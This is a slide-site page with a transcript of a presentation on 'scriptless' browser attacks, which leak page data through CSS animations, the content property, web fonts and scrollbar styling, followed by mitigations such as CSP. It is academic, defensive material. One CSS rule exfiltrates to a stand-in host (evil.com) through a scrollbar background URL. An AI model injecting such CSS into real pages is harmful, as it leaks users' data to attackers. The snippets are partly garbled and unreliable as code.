SCRIPT LESS ATTACKS STEALING THE PIE WITHOUT TOUCHING THE SILL.

Slides:



Advertisements
Similar presentations
Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
Advertisements

HTML I. HTML Hypertext mark-up language. Uses tags to identify elements of a page so that a browser such as Internet explorer can render the page on a.
What is jQuery Mobile? How to use it? Doncho Minkov Telerik Corporation Technical Trainer.
Cascading Style Sheets
Introduction to CSS.
CONCEPTS FOR FLUID LAYOUT Web Page Layout. Website Layouts Most websites have organized their content in multiple columns (formatted like a magazine or.
An Evaluation of the Google Chrome Extension Security Architecture
Using Cascading Style Sheets CSS Basics. Goals Understand basic syntax of Cascading Style Sheets (CSS) Understand basic syntax of Cascading Style Sheets.
New Computer Security Threat - ClickJacking Ehab Ashary CS591-F2010 University of Colorado, Colorado Springs Dr. C.Edward Chow.
Chapter 9 Introduction to the Document Object Model (DOM) JavaScript, Third Edition.
Happy Hacking HTML5! Group members: Dongyang Zhang Wei Liu Weizhou He Yutong Wei Yuxin Zhu.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
CISC 474: Advanced Web Technologies HTML5 & CSS3, & Responsive Design.
TUTORIAL 8: Enhancing a Web Site with Advanced CSS
 jQuery Mobile An Introduction. What is jQuery Mobile  A framework built on top of jQuery, used for creating mobile web applications  Designed to make.
D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.
Basics of HTML.
INTRODUCTION TO CLIENT-SIDE WEB PROGRAMMING ACM 511 ACM 262 Course Notes.
E0262 – MIS – Multimedia Storage Techniques SMIL – Synchronized Multimedia Integration Language.
What is Web Design?  Web design is the creation of a Web page using hypertext or hypermedia to be viewed on the World Wide Web.
4.1 JavaScript Introduction
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
Yahoo! User Interface (YUI) Library Natly Mekdara.
Using Styles and Style Sheets for Design
© 2008 Dr. Paul Walcott – The University of the West Indies: Cave Hill CampusDr. Paul Walcott COMP6325 Advanced Web Technologies Dr. Paul Walcott The University.
CONCEPTS FOR FLUID LAYOUT Web Page Layout. Website Layouts Most websites have organized their content in multiple columns (formatted like a magazine or.
CNIT 133 Interactive Web Pags – JavaScript and AJAX JavaScript Environment.
Intro to Dreamweaver Web Design Section 7-1 Part or all of this lesson was adapted from the University of Washington’s “Web Design & Development I” Course.
1 Background and Text Links CGS3066 Rory J. De Simone.
Working with Objects Creating a Dynamic Web Page.
Copyright 2012 Adobe Systems Incorporated. All rights reserved. ® Copyright 2010 Adobe Systems Incorporated. All rights reserved. ® Copyright 2012 Adobe.
Tutorial 7 Working with Multimedia
Tutorial 7 Designing a Multimedia Web Site
Use CSS to Implement a Reusable Design Selecting a Dreamweaver CSS Starter Layout is the easiest way to create a page with a CSS layout You can access.
Responsive Web Designing Using CSS3 & HTML5 -Sandip Jadhav “We are building a web, for all device ”
I STILL KNOW WHAT YOU VISITED LAST SUMMER User Interaction And Side Channel Attacks On Browser History Zachary Weinberg Eric Y. Chen Pavithra Ramesh Jayaraman.
How the Web Works Building a Website – Lesson 1. How People Access the Web Browsers People access websites using software called a web browser. To view.
University of Central Florida The Postman Always Rings Twice: Attacking & Defending postMessage in HTML5 Websites Ankur Verma University of Central Florida,
TOPIC II Dynamic HTML Prepared by: Nimcan Cabd Cali.
Copyright © Terry Felke-Morris WEB DEVELOPMENT & DESIGN FOUNDATIONS WITH HTML5 Chapter 7 Key Concepts 1 Copyright © Terry Felke-Morris.
HTML JAVASCRIPT. CONTENTS Javascript Example NOSCRIPT Tag Advantages Summary Exercise.
 Web pages originally static  Page is delivered exactly as stored on server  Same information displayed for all users, from all contexts  Dynamic.
1 Utkarsha MishraCOMPSCI 725 David Silver, Suman Jana, Eric Chen, Collin Jackson, and Dan Boneh. “Password Managers: Attacks and Defenses.” In Proceedings.
The Web Wizard’s Guide To DHTML and CSS Chapter 2 A Review of CSS2 and JavaScript.
Learning Aim B.  In this section, you will consider the resources necessary for designing your website.  You will also think about any constraints that.
CHAPTER 7 LESSON C Creating Database Reports. Lesson C Objectives  Display image data in a report  Manually create queries and data links  Create summary.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
The Postman Always Rings Twice: Attacking and Defending postMessage in HTML5 Websites Paper by Sooel Son and Vitaly Shmatikov, The University of Texas.
10 Mobile Application Framework Must Know to Launch New App.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
CONCEPTS FOR FLUID LAYOUT Web Page Layout. Essential Questions What challenges do mobile devices present to Web designers? What are the basic concepts.
How Angular Protects Us From XSS Attacks? XSS (Cross-Site Scripting) is one of the assaults that can influence your site. So as to adapt to the attack,
Group 18: Chris Hood Brett Poche
Implementing Responsive Design UNIT I.
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Implementing Responsive Design
CSS Wrap-Up Lists as a Navigation System CSS Layout CSS Animations
Concepts for fluid layout
CS1220 Web Programming Saloni Chacha.
ASP.NET Core Tag Helpers
Creating Visual Effects and Animation
Introduction to web design discussing which languages is used for website designing
CSS part 2 Outro.
What are Cascading Stylesheets (CSS)?
CSS Boxes CS 1150 Fall 2016.
Web Client Side Technologies Raneem Qaddoura
Concepts for fluid layout
Various mobile devices
Presentation transcript:

SCRIPT LESS ATTACKS STEALING THE PIE WITHOUT TOUCHING THE SILL

BACKGROUND XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking. As popular applications like Skype, Outlook, Thunderbird, Windows 8 are using HTML, security extensions like NoScript are being used by users. Given all these defense strategies, we expect that attackers will thrive towards developing “Scriptless Attacks” which achieve same goal as XSS attacks without using any scripting.

BEYOND SCRIPT-BASED ATTACKS Assumptions: The attacker can inject arbitrary data into the DOM rendered by the browser We assume that scripting is completely disabled The following browser features to be useful building blocks in constructing attacks - Web-fonts based on SVG and WOFF Attacker employ these fonts and utilize their features to vary the properties of displayed website content.

ATTACK COMPONENTS CSS-based Animations With CSS based animations, it is possible to over time change a wide range of CSS and DOM properties without using any script code The CSS Content Property CSS allows to use a property called content to extract arbitrary attribute values and display the value either before, after, or instead of the selected element CSS Media screen and (min -width: 401px){ *{ background:green;} body:after{content:’larger view - port’} screen and (max -width: 400px) { *{ background:red;} body:after{content:’smaller view - port’ } } a[href^=

MEASUREMENT-BASEDCONTENT EXFILTRATION- USING SMART SCROLLBARS To enable a purely CSS-based data exfiltration attack, we utilize all of the available features listed in above section. secret div#s::-webkit -scrollbar -track -piece :vertical:increment { background:red url(// evil.com?s); } To mitigate this attack, it is recommended to treat scrollbar backgrounds and scrollbar state backgrounds equally; all background images and similar external resources should be loaded during page-load and not on appearance or state occurrence.

MITIGATION TECHNIQUES We conclude that several layers of protection are necessary to effectively and holistically defend against CSS-, SVG- and HTML-based data leakage 1.Content Security Policy (CSP) 2.Detecting Detached Views 3.Miscellaneous Defense Techniques Conclusion : While the attacks discussed in this paper presumably do not represent the entirety of ways to illegitimately retrieve sensitive user-data, we believe that the attack components discussed in this paper are of great importance to other attack vectors.